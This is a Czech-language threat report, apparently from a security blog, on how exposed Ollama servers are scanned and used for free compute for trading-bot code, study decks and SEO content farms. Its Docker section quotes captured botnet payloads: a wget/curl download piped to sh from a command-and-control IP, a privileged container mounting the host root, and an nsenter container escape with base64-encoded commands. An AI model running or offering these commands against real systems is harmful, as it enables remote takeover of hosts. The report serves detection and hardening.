Zneužití otevřených instancí Ollama: od obchodních robotů po farmy obsahu
Otevřené instance Ollama jsou využívány k generování kódu obchodních strategií, tvorbě vzdělávacího obsahu a masovému vytváření SEO textů. Výpadky byly zaznamenány v Německu, USA a Rusku – například požadavky na populární modely jako llama3.1:8b nebo qwen2.5:7b. Útočníci provádějí rozvědku, kontrolu funkčnosti a paralelní testování API koncových bodů před využitím cizího GPU.
Rozvědka a ověření dostupnosti
Skenery začínají základními požadavky pro ověření funkčnosti instance. Typické koncové body:
GET /api/tags– seznam dostupných modelů v Ollama API.GET /v1/models– kompatibilní s OpenAI seznam modelů.GET /api/version– verze serveru.
Na uzlu ve Spojených státech bylo během týdne zaznamenáno 244 požadavků /v1/models a 58 na /api/tags. Jeden IP adresu prováděl kontrolu každých 20 minut prostřednictvím POST /v1/chat/completions s hláškou {"messages": [{"role": "user", "content": "health-check"}]} – celkem 244 opakování.
Prohledávání modelů následuje určitý vzor: odeslání jednoduchého promptu Hello nebo hi na modely llama3.1:8b, qwen2.5:7b, codellama:13b, mistral:7b, deepseek:33b, llama3.2. Pokud model odpovídá, instance je označena jako vhodná.
Využití: typy úloh
Po dokončení rozvědky následují skutečné úkoly. Byly zaznamenány tři kategorie.
Obchodní roboti
Automatizovaný pipeline na americkém uzlu generuje kód strategie po dokončení health-checku:
{
"messages": [{
"role": "user",
"content": "Write Python 3 code for:\ndef backtest_strategy(prices: list[float]) -> float:\nUse a 10-period fast SMA and 50-period slow SMA crossover on prices, long when fast > slow, flat/short when fast < slow, and return total PnL as a float. Output only that function, no extra text."
}]
}
Prompt byl opakován 12krát na třech modelech prostřednictvím /api/chat, /v1/chat/completions, /v1/completions. Jedná se o systematický hledání bezplatného backendu pro algoritmický obchodování.
Proxy pro LLM klienty
Server v Číně: klient GLM předával historii rozhovoru, včetně system promptu a předchozích odpovědí. Požadavek na Anki kartičky o Maoově teorii o sporu: Make a 30-card Anki deck about Mao's theory of contradiction. Finální test: What model are you.
Farmy obsahu
Na ruském uzlu – šablonové prompty pro SEO:
Answer the following question thoroughly and in detail.
Question: How have neural networks and deep learning transformed AI?
RULES:
- Write a complete, detailed answer.
- Do NOT repeat the question.
- Do NOT add a preamble.
- Your LAST line must be exactly: ##ANSWER_DONE##
Answer:
Stop-slovo ##ANSWER_DONE## pro parser. Témata: strojové učení, evoluce AI. Paralelní odesílání na tři modely s řetězením myšlenek.
Paralelní útoky na infrastrukturu
Skenery Ollama kombinují s útoky na Docker (port 2375) a Kubelet (10250).
Docker exploity
Botnet docker.selfrep (C2: 31.57.216.121) provádí:
{
"Cmd": ["sh", "-c",
"(wget --no-check-certificate -qO- https://31.57.216.121/sh || curl -sk https://31.57.216.121/sh) | sh -s docker.selfrep"]
}
Nebezpečnější botnet (C2: 45.194.92.39) používá privilegované kontejnery:
{
"Image": "alpine",
"Cmd": ["sh", "-c", "echo d2dldCBodHRw...== | base64 -d | sh"],
"HostConfig": {
"Binds": ["/:/host"],
"Privileged": true
}
}
Alternativa – nsenter escape:
{
"Cmd": ["nsenter", "--target", "1",
"--mount", "--uts", "--ipc", "--net", "--pid",
"--", "bash", "-c", "echo d2dldCBodHRw...== | base64 -d | sh"]
}
Rozvědka Kubeletu
Požadavky /api/v1/pods, /healthz a ML-specifický /update_weights_from_tensor ukazují na hledání datových toků.
Důležité informace
- Otevřené instance Ollama jsou integrovány do plynulých procesů pro obchodování, vzdělávání a SEO bez ověření identity.
- Health-check a prohledávání modelů (llama3.1, qwen2.5 atd.) jsou standardní pro automatizované skenery.
- Útoky na Docker kombinují únik z kontejneru přes nsenter a privilegované připojení s base64 obfuskací.
- Značky jako
##ANSWER_DONE##nebohealth-checkpomáhají detekovat farmy. - Ochrana vyžaduje lokální vázaní, reverse proxy a monitorování provozu.
— Editorial Team
Zatím žádné komentáře.